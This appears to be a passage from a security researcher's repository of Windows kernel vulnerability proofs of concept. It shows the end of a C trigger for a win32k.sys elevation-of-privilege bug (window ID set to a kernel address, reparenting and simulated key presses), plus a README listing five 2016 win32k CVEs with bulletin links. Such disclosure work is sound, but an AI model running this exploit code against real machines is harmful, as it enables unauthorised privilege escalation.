| if (NULL == hWndChild) 209 | { 210 | break; 211 | } 212 | 213 | #ifdef _WIN64 214 | pId = ( (UCHAR*)pAddress - 0x28 ); 215 | #else 216 | pId = ( (UCHAR*)pAddress - 0x14); 217 | #endif // #ifdef _WIN64 218 | 219 | SetWindowLongPtr(hWndChild , GWLP_ID , (LONG_PTR)pId ); 220 | 221 | DbgPrint("hWndChild = 0x%p\n" , hWndChild); 222 | DebugBreak(); 223 | 224 | ShowWindow(hWndParent , SW_SHOWNORMAL); 225 | 226 | SetParent(hWndChild , GetDesktopWindow() ); 227 | 228 | SetForegroundWindow(hWndChild); 229 | 230 | _sim_alt_shift_tab(4); 231 | 232 | SwitchToThisWindow(hWndChild , TRUE); 233 | 234 | _sim_alt_shift_esc(); 235 | 236 | 237 | while( GetMessage(&stMsg , NULL , 0 , 0) ) 238 | { 239 | TranslateMessage(&stMsg); 240 | DispatchMessage(&stMsg); 241 | } 242 | 243 | 244 | } while (FALSE); 245 | 246 | if ( NULL != hWndParent ) 247 | { 248 | DestroyWindow(hWndParent); 249 | hWndParent = NULL; 250 | } 251 | 252 | if ( NULL != hWndChild ) 253 | { 254 | DestroyWindow(hWndChild); 255 | hWndChild = NULL; 256 | } 257 | 258 | UnregisterClassW(pszClassName , GetModuleHandleW(NULL) ); 259 | 260 | return 0; 261 | } 262 | 263 | int __cdecl wmain(int nArgc, WCHAR** Argv) 264 | { 265 | do 266 | { 267 | or_address_value_4( (void*)0xFFFFFFFF ); 268 | } while (FALSE); 269 | 270 | return 0; 271 | } 272 | 273 | ``` 274 | 275 | ![](./capture.png) 276 | -------------------------------------------------------------------------------- /CVE-2016-7260/readme.md: -------------------------------------------------------------------------------- 1 | [MS16-151](https://technet.microsoft.com/library/security/MS16-151) -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # kernel vulnerability 2 | all of them except CVE-2016-7255 are found by me. 3 | 4 | all of them found by [javascript kernel fuzz](https://github.com/tinysec/public/tree/master/FuzzWindowsKernelViaJavascript) 5 | 6 | 7 | | CVE | MSID | type | module | object |comment 8 | | ------| ------ | ------ |------ | ------ | ------ 9 | | CVE-2016-0048 | [MS16-034](https://technet.microsoft.com/en-us/library/security/ms16-034.aspx) | out-of-band | win32k.sys | MSG | Elevation of Privilege 10 | | CVE-2016-0096 | [MS16-018](https://technet.microsoft.com/en-us/library/security/ms16-018.aspx) | type-confusion | win32k.sys | HWND | Elevation of Privilege 11 | | CVE-2016-3252 | [MS16-090](https://technet.microsoft.com/en-us/library/security/ms16-090.aspx) | out-of-band | win32k.sys | GDI | Elevation of Privilege 12 | | CVE-2016-7211 | [MS16-123](https://technet.microsoft.com/library/security/MS16-123) | use-after-free | win32k.sys | HDC | Elevation of Privilege 13 | | CVE-2016-7260 | [MS16-151](https://technet.microsoft.com/library/security/MS16-151) | out-of-band | win32k.sys | GDI | Elevation of Privilege 14 | 15 | --------------------------------------------------------------------------------